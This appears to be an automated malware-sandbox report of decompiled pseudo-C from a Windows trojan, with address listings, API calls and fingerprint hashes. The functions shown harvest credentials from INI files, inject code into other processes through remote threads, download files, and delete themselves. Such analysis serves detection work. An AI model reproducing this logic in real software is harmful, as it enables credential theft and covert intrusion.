				_v12 = _t83;
				if(_t83 == 0) {
					goto L17;
				} else {
					_t5 =  &(_t83[0x2fd]); // 0x5fa
					_v16 = _t5;
					_v8 = _t86;
					_t48 = 0x65;
					E00419897(_t48,  &_v112);
					_t50 = 0x66;
					E00419897(_t50,  &_v48);
					_t52 = 0x67;
					E00419897(_t52,  &_v32);
					_t54 = 0x68;
					E00419897(_t54,  &_v88);
					_t56 = 0x69;
					E00419897(_t56,  &_v68);
					goto L6;
					L15:
					_t61 = E00412BEA(_v8, 1);
					_v8 = _t61;
					if(_t61 != 0) {
						_t83 = _v12;
						L6:
						if(StrStrIW(_v8,  &_v112) == 0) {
							_t64 = StrStrIW(_v8,  &_v48);
							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
								_t84 =  &(_t83[0xff]);
								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
									_t26 =  &(_t84[0xff]); // 0x0
									_t94 = _t26;
									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E004092B1(_t81, _t94) > 0) {
										_t95 =  &_v144;
										_t72 = 0x56;
										E00419897(_t72,  &_v144);
										_push(_v12);
										_t30 =  &(_t84[0xff]); // 0x0
										_push(_t84);
										_t85 = _v16;
										_t81 = 0x307;
										_t76 = E004129F1(_t95, 0x307, _v16, _t95);
										_t97 = _t97 + 0x10;
										if(_t76 > 0) {
											_t96 = _a8;
											if(E004120F2(_t76, _t96, _t85) != 0) {
												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
											}
										}
									}
								}
							}
						}
						goto L15;
					} else {
						E00411CFE(_v12);
						_t86 = _v20;
						goto L17;
					}
				}
			}

0x0040941c
0x0040942d
0x00409432
0x00409436
0x0040943b
0x004095bc
0x004095bc
0x00409453
0x00409457
0x004095b2
0x00000000
0x004095b3
0x0040945d
0x00409469
0x00000000
0x00000000
0x00409479
0x0040947b
0x00409480
0x00000000
0x00409486
0x00409486
0x0040948e
0x00409491
0x00409497
0x00409498
0x004094a2
0x004094a3
0x004094ad
0x004094ae
0x004094b8
0x004094b9
0x004094c3
0x004094c4
0x004094c9
0x00409592
0x00409597
0x0040959c
0x004095a1
0x004094cb
0x004094ce
0x004094df
0x004094ec
0x004094f0
0x00409515
0x0040952a
0x00409533
0x00409533
0x00409544
0x00409552
0x00409558
0x00409559
0x0040955e
0x00409561
0x00409568
0x00409569
0x0040956f
0x00409574
0x00409579
0x0040957e
0x00409580
0x0040958d
0x0040958f
0x0040958f
0x0040958d
0x0040957e
0x00409544
0x0040952a
0x004094f0
0x00000000
0x004095a7
0x004095aa
0x004095af
0x00000000
0x004095af
0x004095a1

APIs

GetPrivateProfileStringW.KERNEL32 ref: 00409453

Part of subcall function 00411CCE: HeapAlloc.KERNEL32(00000008,-00000004,0041349C,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411CDF

StrStrIW.SHLWAPI(?,?), ref: 004094DB
StrStrIW.SHLWAPI(?,?), ref: 004094EC
GetPrivateProfileStringW.KERNEL32 ref: 00409508
GetPrivateProfileStringW.KERNEL32 ref: 00409526
GetPrivateProfileStringW.KERNEL32 ref: 00409540

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$AllocHeap
String ID:
API String ID: 2479592106-0
Opcode ID: d00f48f604f5c4d983bbb0f6b0d6e04d99afc620cf1eb3f03d9dbc97e8f6a27f
Instruction ID: 1f5b467a5f6615199a12082db497050d7a223a643b96cb4042084586d6ea43e6
Opcode Fuzzy Hash: d00f48f604f5c4d983bbb0f6b0d6e04d99afc620cf1eb3f03d9dbc97e8f6a27f
Instruction Fuzzy Hash: 59419232900216FADF11ABA6CD01EEFBB79EF44704F10446AF915F7292D7389E418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004115E4, Relevance: 9.1, APIs: 6, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E004115E4(void* __ebx, void* __ecx, void* __eflags) {
				char _v1168;
				char _v1668;
				char _v1680;
				short _v1688;
				char _v2192;
				short _v2208;
				char _v2720;
				char _v2728;
				char _v2992;
				char _v3072;
				void* __edi;
				void* __esi;
				void* _t34;
				WCHAR* _t50;
				WCHAR* _t51;
				WCHAR* _t52;
				void* _t56;
				void* _t65;

				_t65 = __eflags;
				_t46 = __ecx;
				_push(_t56);
				_t50 =  &_v1668;
				E0041CD51(__ecx, _t50, _t56, 1);
				PathRemoveFileSpecW(_t50);
				_t51 =  &_v2192;
				E0041CD51(_t46, _t51, PathRemoveFileSpecW, 2);
				PathRemoveFileSpecW(_t51);
				 *0x423b60 =  *0x423b60 | 0x00000002;
				_push(0);
				E00410B72();
				E00419B85(_t46, _t65);
				E0041737C( &_v1680, _t65);
				E0041737C(_t51, _t65);
				_t52 =  &_v2720;
				E0041CD51(_t51, _t52, PathRemoveFileSpecW, 3);
				SHDeleteKeyW(0x80000001, _t52);
				CharToOemW( &_v1688,  &_v2728);
				CharToOemW( &_v2208,  &_v2992);
				_t53 =  &_v3072;
				_t34 = 7;
				E00419861(_t34,  &_v3072);
				_push( &_v2992);
				_push( &_v2728);
				_push( &_v2992);
				_push( &_v2728);
				if(E00412A35( &_v3072, 0x474,  &_v1168, _t53) > 0) {
					E004137BE(__ebx, 0x474,  &_v1168);
				}
				if( *0x424028 == 0xffffffff) {
					ExitProcess(0);
				}
				return 1;
			}

0x004115e4
0x004115e4
0x004115f0
0x004115f4
0x004115fb
0x00411609
0x0041160d
0x00411614
0x0041161c
0x0041161e
0x00411625
0x00411627
0x0041162c
0x00411638
0x0041163f
0x00411646
0x0041164d
0x0041165a
0x00411676
0x00411685
0x00411689
0x0041168d
0x0041168e
0x00411697
0x0041169f
0x004116a4
0x004116ac
0x004116c6
0x004116cb
0x004116cb
0x004116d7
0x004116db
0x004116db
0x004116e8

APIs

Part of subcall function 0041CD51: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423BC0,00000032,00020016,?,00000000), ref: 0041CDCC

PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00411609
PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 0041161C

Part of subcall function 00410B72: SetEvent.KERNEL32(0041162C,00000000), ref: 00410B78
Part of subcall function 00410B72: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410B8B

Part of subcall function 00419B85: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000,?,00020EB6), ref: 00419BC2
Part of subcall function 00419B85: Sleep.KERNEL32(000001F4), ref: 00419BD1
Part of subcall function 00419B85: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 00419BE7

Part of subcall function 0041737C: FindFirstFileW.KERNEL32(?,?,?,?), ref: 004173AD
Part of subcall function 0041737C: FindNextFileW.KERNEL32(00000000,?), ref: 00417408
Part of subcall function 0041737C: FindClose.KERNEL32(00000000), ref: 00417413
Part of subcall function 0041737C: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 0041741F
Part of subcall function 0041737C: RemoveDirectoryW.KERNEL32(?), ref: 00417426

SHDeleteKeyW.SHLWAPI(?,?,00000003,00000000), ref: 0041165A
CharToOemW.USER32 ref: 00411676
CharToOemW.USER32 ref: 00411685
ExitProcess.KERNEL32 ref: 004116DB

Part of subcall function 004137BE: CharToOemW.USER32 ref: 004137EE
Part of subcall function 004137BE: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00413872

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
String ID:
API String ID: 1572960351-0
Opcode ID: 3472b72341687278d4a35ba34a83e05e0bad088948d6607f19883c889ed9233f
Instruction ID: d86a50a7599f90da202955a2e631175a7a43dc0372ed09d6c381f42b16f9d49b
Opcode Fuzzy Hash: 3472b72341687278d4a35ba34a83e05e0bad088948d6607f19883c889ed9233f
Instruction Fuzzy Hash: D121A4729083449BC230EBA6DC4AFDB7BACEB84354F00092BB55CD71A1DB74A545CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00413B40, Relevance: 9.1, APIs: 6, Instructions: 74
filesynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413B40(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				long _v24;
				void* _t28;
				long _t37;
				void* _t41;

				_v5 = 0;
				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t41 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t28 = E00411CCE(0x1000);
				_v20 = _t28;
				if(_t28 == 0) {
					L13:
					CloseHandle(_t41);
					if(_v5 == 0) {
						E00417064(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t41);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
						break;
					}
					_t37 = _v12;
					if(_t37 != _v24) {
						break;
					}
					_v16 = _v16 + _t37;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E00411CFE(_v20);
				goto L13;
			}

0x00413b5d
0x00413b66
0x00413b6b
0x00413c0b
0x00413c11
0x00413c11
0x00413b76
0x00413b7b
0x00413b80
0x00413bf7
0x00413bf8
0x00413c01
0x00413c06
0x00413c06
0x00000000
0x00413c01
0x00413b82
0x00413b85
0x00413bb2
0x00000000
0x00000000
0x00413bb7
0x00413be5
0x00413beb
0x00000000
0x00413beb
0x00413bcd
0x00000000
0x00000000
0x00413bcf
0x00413bd5
0x00000000
0x00000000
0x00413bd7
0x00413be0
0x00000000
0x00000000
0x00000000
0x00413be2
0x00413bf2
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 00413B60
WaitForSingleObject.KERNEL32(?,00000000), ref: 00413B8E
InternetReadFile.WININET(00001000,?,00001000,?), ref: 00413BAA
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00413BC5
FlushFileBuffers.KERNEL32(00000000), ref: 00413BE5
CloseHandle.KERNEL32(00000000), ref: 00413BF8

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
String ID:
API String ID: 3509176705-0
Opcode ID: a17a9cdbe3e7b7b013d15a1331bcea809d1baf8f0a001b0e9977f4eb98896287
Instruction ID: 762323041f3b511488a650bc342d812b349e5f63327be035d82a57b595241685
Opcode Fuzzy Hash: a17a9cdbe3e7b7b013d15a1331bcea809d1baf8f0a001b0e9977f4eb98896287
Instruction Fuzzy Hash: C821AF31A08249BFDF119FA4CC84FEE7BB9AB04346F00447AF511B5261E7399E859B28

Uniqueness

Uniqueness Score: -1.00%

Function 0041643E, Relevance: 9.1, APIs: 6, Instructions: 72
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041643E(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				intOrPtr* _v8;
				long _v12;
				struct HWND__* _v16;
				int _v20;
				struct HWND__* _v24;
				long _t24;
				struct HWND__* _t33;
				intOrPtr* _t44;

				_push(_a8);
				_t44 = __edx;
				_v8 = __edx;
				_v20 = __ecx;
				_t33 = WindowFromPoint(_a4.x);
				if(_t33 != 0) {
					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
						_t24 = _v12;
						if(_t24 != 0xffffffff) {
							if(_t44 != 0) {
								 *_t44 = _t24;
							}
						} else {
							_v16 = _t33;
							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
							_t33 = E0041643E(_v20, _v8, _a4, _a8);
							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
						}
					} else {
						_t33 = 0;
					}
				}
				return _t33;
			}

0x0041644a
0x0041644d
0x00416452
0x00416456
0x00416460
0x00416464
0x00416493
0x00416499
0x004164a0
0x004164f1
0x004164f3
0x004164f3
0x004164a2
0x004164ab
0x004164c0
0x004164db
0x004164eb
0x004164eb
0x00416495
0x00416495
0x00416495
0x00416493
0x004164fd

APIs

WindowFromPoint.USER32(?,?), ref: 0041645A
SendMessageTimeoutW.USER32 ref: 0041648B
GetWindowLongW.USER32(00000000,000000F0), ref: 004164AF
SetWindowLongW.USER32 ref: 004164C0
GetWindowLongW.USER32(?,000000F0), ref: 004164DD
SetWindowLongW.USER32 ref: 004164EB

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Window$Long$FromMessagePointSendTimeout
String ID:
API String ID: 2645164282-0
Opcode ID: 655531a235bd0dbbf39ddf06de3dee46542ef769496b83b6bf62ed187e13ec78
Instruction ID: eddfeb4c5a8e0d1f34b1a532a8465685b4c30a7f3da5e6ff95818b41fc791df3
Opcode Fuzzy Hash: 655531a235bd0dbbf39ddf06de3dee46542ef769496b83b6bf62ed187e13ec78
Instruction Fuzzy Hash: 7421D571508316ABD7109F28CC40EAB7B98EB94330F20472EBDB0922E1DA74E844DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0041643E, Relevance: 9.1, APIs: 6, Instructions: 72
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041643E(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				intOrPtr* _v8;
				long _v12;
				struct HWND__* _v16;
				int _v20;
				struct HWND__* _v24;
				long _t24;
				struct HWND__* _t33;
				intOrPtr* _t44;

				_push(_a8);
				_t44 = __edx;
				_v8 = __edx;
				_v20 = __ecx;
				_t33 = WindowFromPoint(_a4.x);
				if(_t33 != 0) {
					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
						_t24 = _v12;
						if(_t24 != 0xffffffff) {
							if(_t44 != 0) {
								 *_t44 = _t24;
							}
						} else {
							_v16 = _t33;
							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
							_t33 = E0041643E(_v20, _v8, _a4, _a8);
							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
						}
					} else {
						_t33 = 0;
					}
				}
				return _t33;
			}

APIs

WindowFromPoint.USER32(?,?), ref: 0041645A
SendMessageTimeoutW.USER32 ref: 0041648B
GetWindowLongW.USER32(00000000,000000F0), ref: 004164AF
SetWindowLongW.USER32 ref: 004164C0
GetWindowLongW.USER32(?,000000F0), ref: 004164DD
SetWindowLongW.USER32 ref: 004164EB

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$Long$FromMessagePointSendTimeout
String ID:
API String ID: 2645164282-0
Opcode ID: 655531a235bd0dbbf39ddf06de3dee46542ef769496b83b6bf62ed187e13ec78
Instruction ID: eddfeb4c5a8e0d1f34b1a532a8465685b4c30a7f3da5e6ff95818b41fc791df3
Opcode Fuzzy Hash: 655531a235bd0dbbf39ddf06de3dee46542ef769496b83b6bf62ed187e13ec78
Instruction Fuzzy Hash: 7421D571508316ABD7109F28CC40EAB7B98EB94330F20472EBDB0922E1DA74E844DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00416F1E, Relevance: 9.1, APIs: 6, Instructions: 68
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00416F1E(signed int __eax, void* __ecx, void** __esi, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;

				_t33 = __esi;
				asm("sbb eax, eax");
				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) {
						L10:
						CloseHandle(_t33[2]);
						goto L11;
					} else {
						_t22 = _v12;
						__esi[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
							 *__esi = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
									VirtualFree( *_t33, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}

0x00416f1e
0x00416f31
0x00416f43
0x00416f49
0x00416f4f
0x00416fbf
0x00416fbf
0x00416f51
0x00416f56
0x00416f5e
0x00416fb6
0x00416fb9
0x00000000
0x00416f65
0x00416f65
0x00416f68
0x00416f6d
0x00416f7e
0x00416f84
0x00416f88
0x00000000
0x00416f8a
0x00416f9e
0x00416fb0
0x00000000
0x00000000
0x00000000
0x00000000
0x00416f9e
0x00416f6f
0x00416f6f
0x00416f71
0x00416f71
0x00416f71
0x00416f6d
0x00416f5e
0x00416fc3

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0041D23F,?,?,00000000), ref: 00416F43
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0041D23F,?,?,00000000), ref: 00416F56
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,0041D23F,?,?,00000000), ref: 00416F7E
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0041D23F,?,?,00000000), ref: 00416F96
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,0041D23F,?,?,00000000), ref: 00416FB0
CloseHandle.KERNEL32(?,?,?,?,?,0041D23F,?,?,00000000), ref: 00416FB9

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: fca3f4c0c788685756dda70a8404c1b1278f418756d445aa081f114cca3b8bea
Instruction ID: 2642e8169926d688b4e3f124a82999e8e06a5e3b16fcc6d231804f51d0490611
Opcode Fuzzy Hash: fca3f4c0c788685756dda70a8404c1b1278f418756d445aa081f114cca3b8bea
Instruction Fuzzy Hash: AF119071100200BFDB218F60DD49EABBBFCEB55750B11492DF596E61A0D671E981CB28

Uniqueness

Uniqueness Score: -1.00%

Function 00406CC6, Relevance: 9.1, APIs: 6, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00406CC6(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
				void* _t21;
				int _t22;
				signed int _t23;
				struct HWND__* _t27;
				char* _t31;

				_t27 = _a4;
				if(( *0x423b60 & 0x00000004) == 0 || E0041CB59() == 0) {
					L7:
					return GetUpdateRgn(_t27, _a8, _a12);
				} else {
					_t31 = TlsGetValue( *0x42291c);
					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
						goto L7;
					} else {
						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
						if(_a12 != 0) {
							_t22 = SaveDC( *(_t31 + 8));
							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
							RestoreDC( *(_t31 + 8), _t22);
						}
						 *_t31 = 1;
						_t21 = 2;
						return _t21;
					}
				}
			}

0x00406cd1
0x00406cd5
0x00406d47
0x00000000
0x00406ce0
0x00406cec
0x00406cf0
0x00000000
0x00406cf7
0x00406d06
0x00406d10
0x00406d16
0x00406d26
0x00406d2e
0x00406d35
0x00406d38
0x00406d3e
0x00406d41
0x00406d44
0x00000000
0x00406d44
0x00406cf0

APIs

GetUpdateRgn.USER32 ref: 00406D4E

Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61

TlsGetValue.KERNEL32 ref: 00406CE6
SetRectRgn.GDI32(?,?,?,?,?), ref: 00406D06
SaveDC.GDI32(?), ref: 00406D16
SendMessageW.USER32(?,00000014,?,00000000), ref: 00406D26
RestoreDC.GDI32(?,00000000), ref: 00406D38

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: 9b30061394e02e57e1e2c22dcc98c23f53723d069bf01480b09e76bcd1708ed2
Instruction ID: abf1c81bcc1d5d0e7c9ccec9e24aeaa2e6e20d46a88e9193ff7121f589ff7e51
Opcode Fuzzy Hash: 9b30061394e02e57e1e2c22dcc98c23f53723d069bf01480b09e76bcd1708ed2
Instruction Fuzzy Hash: 0A11AC71100344AFCB325F61ED48FA67BA5FF08310F044929FA82A65B1C335A8A1DB68

Uniqueness

Uniqueness Score: -1.00%

Function 004063F6, Relevance: 9.1, APIs: 6, Instructions: 54
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004063F6(void* __ecx, long _a4, intOrPtr _a8) {
				char _v5;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t14;
				void* _t23;
				void* _t25;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_v5 = 0;
				_t23 = OpenProcess(0x47a, 0, _a4);
				_t28 = _t23;
				if(_t23 != 0) {
					_push(_t25);
					_t10 = E0041CA6E(_t21, _t23, _t25, _t28, _a8, 0);
					_t26 = _t10;
					if(_t26 != 0) {
						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x423b74 + E0041D212, 0, 0, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							VirtualFreeEx(_t23, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t14, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t23);
				}
				return _v5;
			}

0x004063f6
0x004063f9
0x00406407
0x00406410
0x00406412
0x00406414
0x00406416
0x0040641b
0x00406420
0x00406424
0x00406438
0x0040643e
0x00406443
0x00406468
0x00406445
0x0040644b
0x00406454
0x0040645a
0x0040645a
0x00406443
0x0040646f
0x00406475
0x0040647c

APIs

OpenProcess.KERNEL32(0000047A,00000000,0001FDA6,00000000,0001FDA6,?,?,004065AE,?,?,00000000,?,0001FDA6,00000000), ref: 0040640A
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00840D86,00000000,00000000,00000000), ref: 00406438
WaitForSingleObject.KERNEL32(00000000,00002710,?,004065AE,?,?,00000000,?,0001FDA6,00000000), ref: 0040644B
CloseHandle.KERNEL32(0001FDA6,?,004065AE,?,?,00000000,?,0001FDA6,00000000), ref: 00406454
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,004065AE,?,?,00000000,?,0001FDA6,00000000), ref: 00406468
CloseHandle.KERNEL32(00000000,?,00000000,?,?,004065AE,?,?,00000000,?,0001FDA6,00000000), ref: 0040646F

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
String ID:
API String ID: 14861764-0
Opcode ID: 7cd496954eed62964d7ef9b6a3e10d36b7efcb5286d6ba78d7a6a9e12dff4105
Instruction ID: ff0c7bc01d04e5d39be5f9001d6b7d2717d17b2d1483ab124f0dc3f8ad5f9b48
Opcode Fuzzy Hash: 7cd496954eed62964d7ef9b6a3e10d36b7efcb5286d6ba78d7a6a9e12dff4105
Instruction Fuzzy Hash: F801B1B2104248BFEB112F749DCCEBF3E6CDB49794B008179F902F2160C6398C559A39

Uniqueness

Uniqueness Score: -1.00%

Function 0041D772, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041D772(void* _a4, WCHAR* _a8) {
				char _v40;
				char _v160;
				char _v680;
				void* __edi;
				void* __esi;
				void** _t11;
				void* _t13;
				void* _t16;
				void* _t18;
				void* _t23;
				void* _t28;
				void* _t30;
				WCHAR* _t34;

				_t11 =  &_a4;
				_t28 = 0;
				__imp__ConvertSidToStringSidW(_a4, _t11);
				if(_t11 != 0) {
					_t37 =  &_v160;
					_t13 = 4;
					E00419897(_t13,  &_v160);
					_push(_a4);
					_t34 =  &_v680;
					_t16 = E004129F1(_t37, 0x104, _t34, _t37);
					_pop(_t30);
					if(_t16 > 0) {
						_t18 = 5;
						E00419897(_t18,  &_v40);
						_t23 = E00415E26(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
						if(_t23 != 0 && _t23 != 0xffffffff) {
							PathUnquoteSpacesW(_t34);
							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
							asm("sbb bl, bl");
							_t28 = 1;
						}
					}
					LocalFree(_a4);
				}
				return _t28;
			}

0x0041d77c
0x0041d783
0x0041d785
0x0041d78d
0x0041d797
0x0041d79d
0x0041d79e
0x0041d7a3
0x0041d7ae
0x0041d7b4
0x0041d7ba
0x0041d7bd
0x0041d7c4
0x0041d7c5
0x0041d7dc
0x0041d7e3
0x0041d7ed
0x0041d7fa
0x0041d806
0x0041d808
0x0041d808
0x0041d7e3
0x0041d80d
0x0041d814
0x0041d819

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0041D785
LocalFree.KERNEL32(?,.exe,00000000), ref: 0041D80D

Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B

PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 0041D7ED
ExpandEnvironmentStringsW.KERNEL32(?,004114F9,00000104), ref: 0041D7FA

Strings

.exe, xrefs: 0041D794

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
String ID: .exe
API String ID: 2200435814-4119554291
Opcode ID: 678dbf5f367e89032df9beb8caab71a948f06670cdf1cabe41232ca7f86d138f
Instruction ID: b93c94d1df22a06fa92d3cff0c066bef30c711175495abcab106c684caec88bc
Opcode Fuzzy Hash: 678dbf5f367e89032df9beb8caab71a948f06670cdf1cabe41232ca7f86d138f
Instruction Fuzzy Hash: F111E972A00114ABDB107B7ADD09ECB7B6CDF89360F100526F959E71A0D778DD89CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004138D2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004138D2(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t18 = 0;
				do {
					_t1 = _t18 + 0x42200c; // 0x42200c
					_t2 = _t18 + 0x422008; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t18 = _t18 + 8;
				} while (_t18 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}

0x004138d2
0x004138d2
0x004138d8
0x004138da
0x004138da
0x004138ef
0x004138f3
0x00413937
0x00000000
0x00413937
0x004138f6
0x004138f8
0x004138fa
0x00413901
0x00413908
0x0041390e
0x00413911
0x00413925
0x0041392e
0x00413931
0x00000000
0x00413931
0x0041393b

APIs

